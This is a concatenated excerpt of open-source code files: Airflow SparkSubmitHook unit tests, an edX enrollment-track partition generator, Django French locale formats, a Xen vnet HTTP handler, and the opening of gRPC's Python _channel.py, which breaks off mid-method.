"master": "k8s://https://k8s-master",
"deploy_mode": "cluster",
"namespace": "airflow",
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "k8s://https://k8s-master"
assert dict_cmd["--deploy-mode"] == "cluster"
assert dict_cmd["--conf"] == "spark.kubernetes.namespace=airflow"
def test_resolve_connection_spark_home_set_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_home_set')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn://yarn-master",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": "/opt/myspark",
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == '/opt/myspark/bin/spark-submit'
def test_resolve_connection_spark_home_not_set_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_home_not_set')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn://yarn-master",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == 'spark-submit'
def test_resolve_connection_spark_binary_set_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_binary_set')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn",
"spark_binary": "custom-spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == 'custom-spark-submit'
def test_resolve_connection_spark_binary_default_value_override(self):
# Given
hook = SparkSubmitHook(conn_id='spark_binary_set', spark_binary='another-custom-spark-submit')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn",
"spark_binary": "another-custom-spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == 'another-custom-spark-submit'
def test_resolve_connection_spark_binary_default_value(self):
# Given
hook = SparkSubmitHook(conn_id='spark_default')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": 'root.default',
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == 'spark-submit'
def test_resolve_connection_spark_binary_and_home_set_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_binary_and_home_set')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "yarn",
"spark_binary": "custom-spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": "/path/to/spark_home",
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == '/path/to/spark_home/bin/custom-spark-submit'
def test_resolve_connection_spark_standalone_cluster_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_standalone_cluster')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_spark_connection = {
"master": "spark://spark-standalone-master:6066",
"spark_binary": "spark-submit",
"deploy_mode": "cluster",
"queue": None,
"spark_home": "/path/to/spark_home",
"namespace": None,
}
assert connection == expected_spark_connection
assert cmd[0] == '/path/to/spark_home/bin/spark-submit'
def test_resolve_spark_submit_env_vars_standalone_client_mode(self):
# Given
hook = SparkSubmitHook(conn_id='spark_standalone_cluster_client_mode', env_vars={"bar": "foo"})
# When
hook._build_spark_submit_command(self._spark_job_file)
# Then
assert hook._env == {"bar": "foo"}
def test_resolve_spark_submit_env_vars_standalone_cluster_mode(self):
def env_vars_exception_in_standalone_cluster_mode():
# Given
hook = SparkSubmitHook(conn_id='spark_standalone_cluster', env_vars={"bar": "foo"})
# When
hook._build_spark_submit_command(self._spark_job_file)
# Then
with pytest.raises(AirflowException):
env_vars_exception_in_standalone_cluster_mode()
def test_resolve_spark_submit_env_vars_yarn(self):
# Given
hook = SparkSubmitHook(conn_id='spark_yarn_cluster', env_vars={"bar": "foo"})
# When
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
assert cmd[4] == "spark.yarn.appMasterEnv.bar=foo"
assert hook._env == {"bar": "foo"}
def test_resolve_spark_submit_env_vars_k8s(self):
# Given
hook = SparkSubmitHook(conn_id='spark_k8s_cluster', env_vars={"bar": "foo"})
# When
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
assert cmd[4] == "spark.kubernetes.driverEnv.bar=foo"
def test_process_spark_submit_log_yarn(self):
# Given
hook = SparkSubmitHook(conn_id='spark_yarn_cluster')
log_lines = [
'SPARK_MAJOR_VERSION is set to 2, using Spark2',
'WARN NativeCodeLoader: Unable to load native-hadoop library for your '
+ 'platform... using builtin-java classes where applicable',
'WARN DomainSocketFactory: The short-circuit local reads feature cannot '
'be used because libhadoop cannot be loaded.',
'INFO Client: Requesting a new application from cluster with 10 NodeManagers',
'INFO Client: Submitting application application_1486558679801_1820 ' + 'to ResourceManager',
]
# When
hook._process_spark_submit_log(log_lines)
# Then
assert hook._yarn_application_id == 'application_1486558679801_1820'
def test_process_spark_submit_log_k8s(self):
# Given
hook = SparkSubmitHook(conn_id='spark_k8s_cluster')
log_lines = [
'INFO LoggingPodStatusWatcherImpl:54 - State changed, new state:'
+ 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver'
+ 'namespace: default'
+ 'labels: spark-app-selector -> spark-465b868ada474bda82ccb84ab2747fcd,'
+ 'spark-role -> driver'
+ 'pod uid: ba9c61f6-205f-11e8-b65f-d48564c88e42'
+ 'creation time: 2018-03-05T10:26:55Z'
+ 'service account name: spark'
+ 'volumes: spark-init-properties, download-jars-volume,'
+ 'download-files-volume, spark-token-2vmlm'
+ 'node name: N/A'
+ 'start time: N/A'
+ 'container images: N/A'
+ 'phase: Pending'
+ 'status: []'
+ '2018-03-05 11:26:56 INFO LoggingPodStatusWatcherImpl:54 - State changed,'
+ ' new state:'
+ 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver'
+ 'namespace: default'
+ 'Exit code: 999'
]
# When
hook._process_spark_submit_log(log_lines)
# Then
assert hook._kubernetes_driver_pod == 'spark-pi-edf2ace37be7353a958b38733a12f8e6-driver'
assert hook._spark_exit_code == 999
def test_process_spark_submit_log_k8s_spark_3(self):
# Given
hook = SparkSubmitHook(conn_id='spark_k8s_cluster')
log_lines = ['exit code: 999']
# When
hook._process_spark_submit_log(log_lines)
# Then
assert hook._spark_exit_code == 999
def test_process_spark_submit_log_standalone_cluster(self):
# Given
hook = SparkSubmitHook(conn_id='spark_standalone_cluster')
log_lines = [
'Running Spark using the REST application submission protocol.',
'17/11/28 11:14:15 INFO RestSubmissionClient: Submitting a request '
'to launch an application in spark://spark-standalone-master:6066',
'17/11/28 11:14:15 INFO RestSubmissionClient: Submission successfully '
+ 'created as driver-20171128111415-0001. Polling submission state...',
]
# When
hook._process_spark_submit_log(log_lines)
# Then
assert hook._driver_id == 'driver-20171128111415-0001'
def test_process_spark_driver_status_log(self):
# Given
hook = SparkSubmitHook(conn_id='spark_standalone_cluster')
log_lines = [
'Submitting a request for the status of submission '
+ 'driver-20171128111415-0001 in spark://spark-standalone-master:6066',
'17/11/28 11:15:37 INFO RestSubmissionClient: Server responded with '
+ 'SubmissionStatusResponse:',
'{',
'"action" : "SubmissionStatusResponse",',
'"driverState" : "RUNNING",',
'"serverSparkVersion" : "1.6.0",',
'"submissionId" : "driver-20171128111415-0001",',
'"success" : true,',
'"workerHostPort" : "172.18.0.7:38561",',
'"workerId" : "worker-20171128110741-172.18.0.7-38561"',
'}',
]
# When
hook._process_spark_status_log(log_lines)
# Then
assert hook._driver_status == 'RUNNING'
@patch('airflow.providers.apache.spark.hooks.spark_submit.renew_from_kt')
@patch('airflow.providers.apache.spark.hooks.spark_submit.subprocess.Popen')
def test_yarn_process_on_kill(self, mock_popen, mock_renew_from_kt):
# Given
mock_popen.return_value.stdout = io.StringIO('stdout')
mock_popen.return_value.stderr = io.StringIO('stderr')
mock_popen.return_value.poll.return_value = None
mock_popen.return_value.wait.return_value = 0
log_lines = [
'SPARK_MAJOR_VERSION is set to 2, using Spark2',
'WARN NativeCodeLoader: Unable to load native-hadoop library for your '
+ 'platform... using builtin-java classes where applicable',
'WARN DomainSocketFactory: The short-circuit local reads feature cannot '
+ 'be used because libhadoop cannot be loaded.',
'INFO Client: Requesting a new application from cluster with 10 '
+ 'NodeManagerapplication_1486558679801_1820s',
'INFO Client: Submitting application application_1486558679801_1820 ' + 'to ResourceManager',
]
env = {"PATH": "hadoop/bin"}
hook = SparkSubmitHook(conn_id='spark_yarn_cluster', env_vars=env)
hook._process_spark_submit_log(log_lines)
hook.submit()
# When
hook.on_kill()
# Then
assert (
call(
['yarn', 'application', '-kill', 'application_1486558679801_1820'],
env={**os.environ, **env},
stderr=-1,
stdout=-1,
)
in mock_popen.mock_calls
)
# resetting the mock to test kill with keytab & principal
mock_popen.reset_mock()
# Given
hook = SparkSubmitHook(
conn_id='spark_yarn_cluster', keytab='privileged_user.keytab', principal='user/spark@airflow.org'
)
hook._process_spark_submit_log(log_lines)
hook.submit()
# When
hook.on_kill()
# Then
expected_env = os.environ.copy()
expected_env["KRB5CCNAME"] = '/tmp/airflow_krb5_ccache'
assert (
call(
['yarn', 'application', '-kill', 'application_1486558679801_1820'],
env=expected_env,
stderr=-1,
stdout=-1,
)
in mock_popen.mock_calls
)
def test_standalone_cluster_process_on_kill(self):
# Given
log_lines = [
'Running Spark using the REST application submission protocol.',
'17/11/28 11:14:15 INFO RestSubmissionClient: Submitting a request '
+ 'to launch an application in spark://spark-standalone-master:6066',
'17/11/28 11:14:15 INFO RestSubmissionClient: Submission successfully '
+ 'created as driver-20171128111415-0001. Polling submission state...',
]
hook = SparkSubmitHook(conn_id='spark_standalone_cluster')
hook._process_spark_submit_log(log_lines)
# When
kill_cmd = hook._build_spark_driver_kill_command()
# Then
assert kill_cmd[0] == '/path/to/spark_home/bin/spark-submit'
assert kill_cmd[1] == '--master'
assert kill_cmd[2] == 'spark://spark-standalone-master:6066'
assert kill_cmd[3] == '--kill'
assert kill_cmd[4] == 'driver-20171128111415-0001'
@patch('airflow.kubernetes.kube_client.get_kube_client')
@patch('airflow.providers.apache.spark.hooks.spark_submit.subprocess.Popen')
def test_k8s_process_on_kill(self, mock_popen, mock_client_method):
# Given
mock_popen.return_value.stdout = io.StringIO('stdout')
mock_popen.return_value.stderr = io.StringIO('stderr')
mock_popen.return_value.poll.return_value = None
mock_popen.return_value.wait.return_value = 0
client = mock_client_method.return_value
hook = SparkSubmitHook(conn_id='spark_k8s_cluster')
log_lines = [
'INFO LoggingPodStatusWatcherImpl:54 - State changed, new state:'
+ 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver'
+ 'namespace: default'
+ 'labels: spark-app-selector -> spark-465b868ada474bda82ccb84ab2747fcd,'
+ 'spark-role -> driver'
+ 'pod uid: ba9c61f6-205f-11e8-b65f-d48564c88e42'
+ 'creation time: 2018-03-05T10:26:55Z'
+ 'service account name: spark'
+ 'volumes: spark-init-properties, download-jars-volume,'
+ 'download-files-volume, spark-token-2vmlm'
+ 'node name: N/A'
+ 'start time: N/A'
+ 'container images: N/A'
+ 'phase: Pending'
+ 'status: []'
+ '2018-03-05 11:26:56 INFO LoggingPodStatusWatcherImpl:54 - State changed,'
+ ' new state:'
+ 'pod name: spark-pi-edf2ace37be7353a958b38733a12f8e6-driver'
+ 'namespace: default'
+ 'Exit code: 0'
]
hook._process_spark_submit_log(log_lines)
hook.submit()
# When
hook.on_kill()
# Then
import kubernetes
kwargs = {'pretty': True, 'body': kubernetes.client.V1DeleteOptions()}
client.delete_namespaced_pod.assert_called_once_with(
'spark-pi-edf2ace37be7353a958b38733a12f8e6-driver', 'mynamespace', **kwargs
)
@parameterized.expand(
(
(
("spark-submit", "foo", "--bar", "baz", "--password='secret'", "--foo", "bar"),
"spark-submit foo --bar baz --password='******' --foo bar",
),
(
("spark-submit", "foo", "--bar", "baz", "--password='secret'"),
"spark-submit foo --bar baz --password='******'",
),
(
("spark-submit", "foo", "--bar", "baz", '--password="secret"'),
'spark-submit foo --bar baz --password="******"',
),
(
("spark-submit", "foo", "--bar", "baz", '--password=secret'),
'spark-submit foo --bar baz --password=******',
),
(
("spark-submit", "foo", "--bar", "baz", "--password 'secret'"),
"spark-submit foo --bar baz --password '******'",
),
(
("spark-submit", "foo", "--bar", "baz", "--password='sec\"ret'"),
"spark-submit foo --bar baz --password='******'",
),
(
("spark-submit", "foo", "--bar", "baz", '--password="sec\'ret"'),
'spark-submit foo --bar baz --password="******"',
),
(
("spark-submit",),
"spark-submit",
),
)
)
def test_masks_passwords(self, command: str, expected: str) -> None:
# Given
hook = SparkSubmitHook()
# When
command_masked = hook._mask_cmd(command)
# Then
assert command_masked == expected
| apache-2.0 |
mitocw/edx-platform | common/lib/xmodule/xmodule/partitions/enrollment_track_partition_generator.py | 4 | 1792 | """
The enrollment_track dynamic partition generation to be part of the
openedx.dynamic_partition plugin.
"""
import logging
import six
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from xmodule.partitions.partitions import (
get_partition_from_id,
ENROLLMENT_TRACK_PARTITION_ID,
UserPartition,
UserPartitionError
)
log = logging.getLogger(__name__)
FEATURES = getattr(settings, 'FEATURES', {})
def create_enrollment_track_partition(course):
"""
Create and return the dynamic enrollment track user partition.
If it cannot be created, None is returned.
"""
if not FEATURES.get('ENABLE_ENROLLMENT_TRACK_USER_PARTITION'):
return None
try:
enrollment_track_scheme = UserPartition.get_scheme("enrollment_track")
except UserPartitionError:
log.warning("No 'enrollment_track' scheme registered, EnrollmentTrackUserPartition will not be created.")
return None
used_ids = set(p.id for p in course.user_partitions)
if ENROLLMENT_TRACK_PARTITION_ID in used_ids:
log.warning(
"Can't add 'enrollment_track' partition, as ID {id} is assigned to {partition} in course {course}.".format(
id=ENROLLMENT_TRACK_PARTITION_ID,
partition=get_partition_from_id(course.user_partitions, ENROLLMENT_TRACK_PARTITION_ID).name,
course=six.text_type(course.id)
)
)
return None
partition = enrollment_track_scheme.create_user_partition(
id=ENROLLMENT_TRACK_PARTITION_ID,
name=_(u"Enrollment Track Groups"),
description=_(u"Partition for segmenting users by enrollment track"),
parameters={"course_id": six.text_type(course.id)}
)
return partition
| agpl-3.0 |
ubgarbage/gae-blog | django/conf/locale/fr/formats.py | 232 | 1530 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y'
TIME_FORMAT = 'H:i:s'
DATETIME_FORMAT = 'j F Y H:i:s'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j F'
SHORT_DATE_FORMAT = 'j N Y'
SHORT_DATETIME_FORMAT = 'j N Y H:i:s'
FIRST_DAY_OF_WEEK = 1 # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%d/%m/%Y', '%d/%m/%y', # '25/10/2006', '25/10/06'
'%d.%m.%Y', '%d.%m.%y', # Swiss (fr_CH), '25.10.2006', '25.10.06'
'%Y-%m-%d', '%y-%m-%d', # '2006-10-25', '06-10-25'
# '%d %B %Y', '%d %b %Y', # '25 octobre 2006', '25 oct. 2006'
)
TIME_INPUT_FORMATS = (
'%H:%M:%S', # '14:30:59'
'%H:%M', # '14:30'
)
DATETIME_INPUT_FORMATS = (
'%d/%m/%Y %H:%M:%S', # '25/10/2006 14:30:59'
'%d/%m/%Y %H:%M', # '25/10/2006 14:30'
'%d/%m/%Y', # '25/10/2006'
'%d.%m.%Y %H:%M:%S', # Swiss (fr_CH), '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M', # Swiss (fr_CH), '25.10.2006 14:30'
'%d.%m.%Y', # Swiss (fr_CH), '25.10.2006'
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = ' '
NUMBER_GROUPING = 3
| bsd-3-clause |
sunny-wyb/xen-4.1.2 | dist/install/usr/lib/python2.7/site-packages/xen/xend/server/SrvVnetDir.py | 52 | 4339 | #============================================================================
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#============================================================================
# Copyright (C) 2004, 2005 Mike Wray <mike.wray@hp.com>
#============================================================================
from xen.xend import sxp
from xen.xend.Args import FormFn
from xen.xend import PrettyPrint
from xen.xend import XendVnet
from xen.xend.XendError import XendError
from xen.web.SrvDir import SrvDir
class SrvVnet(SrvDir):
def __init__(self, vnetinfo):
SrvDir.__init__(self)
self.vnetinfo = vnetinfo
self.xvnet = XendVnet.instance()
def op_delete(self, op, req):
val = self.xvnet.vnet_delete(self.vnetinfo.id)
return val
def render_POST(self, req):
return self.perform(req)
def render_GET(self, req):
if self.use_sxp(req):
req.setHeader("Content-Type", sxp.mime_type)
sxp.show(self.vnetinfo.sxpr(), out=req)
else:
req.write('<html><head></head><body>')
self.print_path(req)
req.write('<p>Vnet %s</p>' % self.vnetinfo.id)
req.write("<code><pre>")
PrettyPrint.prettyprint(self.vnetinfo.sxpr(), out=req)
req.write("</pre></code>")
self.form(req)
req.write('</body></html>')
return ''
def form(self, req):
url = req.prePathURL()
req.write('<form method="post" action="%s">' % url)
req.write('<input type="submit" name="op" value="delete">')
req.write('</form>')
class SrvVnetDir(SrvDir):
"""Vnet directory.
"""
def __init__(self):
SrvDir.__init__(self)
self.xvnet = XendVnet.instance()
def vnet(self, x):
val = None
vnetinfo = self.xvnet.vnet_get(x)
if not vnetinfo:
raise XendError('No such vnet ' + str(x))
val = SrvVnet(vnetinfo)
return val
def get(self, x):
v = SrvDir.get(self, x)
if v is not None:
return v
v = self.vnet(x)
return v
def op_create(self, op, req):
fn = FormFn(self.xvnet.vnet_create,
[['config', 'sxpr']])
val = fn(req.args, {})
return val
def render_POST(self, req):
return self.perform(req)
def render_GET(self, req):
if self.use_sxp(req):
req.setHeader("Content-Type", sxp.mime_type)
self.ls_vnet(req, 1)
else:
req.write("<html><head></head><body>")
self.print_path(req)
self.ls(req)
self.ls_vnet(req)
self.form(req)
req.write("</body></html>")
def ls_vnet(self, req, use_sxp=0):
url = req.prePathURL()
if not url.endswith('/'):
url += '/'
if use_sxp:
vnets = self.xvnet.vnet_ls()
sxp.show(vnets, out=req)
else:
vnets = self.xvnet.vnets()
vnets.sort(lambda x, y: cmp(x.id, y.id))
req.write('<ul>')
for v in vnets:
req.write('<li><a href="%s%s"> Vnet %s</a>' % (url, v.id, v.id))
req.write('</li>')
req.write('</ul>')
def form(self, req):
"""Generate the form(s) for vnet dir operations.
"""
req.write('<form method="post" action="%s" enctype="multipart/form-data">'
% req.prePathURL())
req.write('<button type="submit" name="op" value="create">Create Vnet</button>')
req.write('Config <input type="file" name="config"><br>')
req.write('</form>')
| gpl-2.0 |
thinkerou/grpc | src/python/grpcio/grpc/_channel.py | 1 | 38484 | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import logging
import sys
import threading
import time
import grpc
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
def _wait_once_until(condition, until):
if until is None:
condition.wait()
else:
remaining = until - time.time()
if remaining < 0:
raise grpc.FutureTimeoutError()
else:
condition.wait(timeout=remaining)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
callback()
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
if cygrpc.is_fork_support_enabled():
condition_wait_timeout = 1.0
else:
condition_wait_timeout = None
def consume_request_iterator(): # pylint: disable=too-many-branches
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
while True:
state.condition.wait(condition_wait_timeout)
cygrpc.block_if_fork_in_progress(state)
if state.code is None:
if cygrpc.OperationType.send_message not in state.due:
break
else:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
class _Rendezvous(grpc.RpcError, grpc.Future, grpc.Call):
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def cancel(self):
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return False
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def result(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(lambda: fn(self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
while True:
self._state.condition.wait()
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def is_active(self):
with self._state.condition:
return self._state.code is None
def time_remaining(self):
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def initial_metadata(self):
with self._state.condition:
while self._state.initial_metadata is None:
self._state.condition.wait()
return self._state.initial_metadata
def trailing_metadata(self):
with self._state.condition:
while self._state.trailing_metadata is None:
self._state.condition.wait()
return self._state.trailing_metadata
def code(self):
with self._state.condition:
while self._state.code is None:
self._state.condition.wait()
return self._state.code
def details(self):
with self._state.condition:
while self._state.details is None:
self._state.condition.wait()
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
while self._state.debug_error_string is None:
self._state.condition.wait()
return _common.decode(self._state.debug_error_string)
def _repr(self):
with self._state.condition:
if self._state.code is None:
return '<_Rendezvous object of in-flight RPC>'
elif self._state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details,
self._state.debug_error_string)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
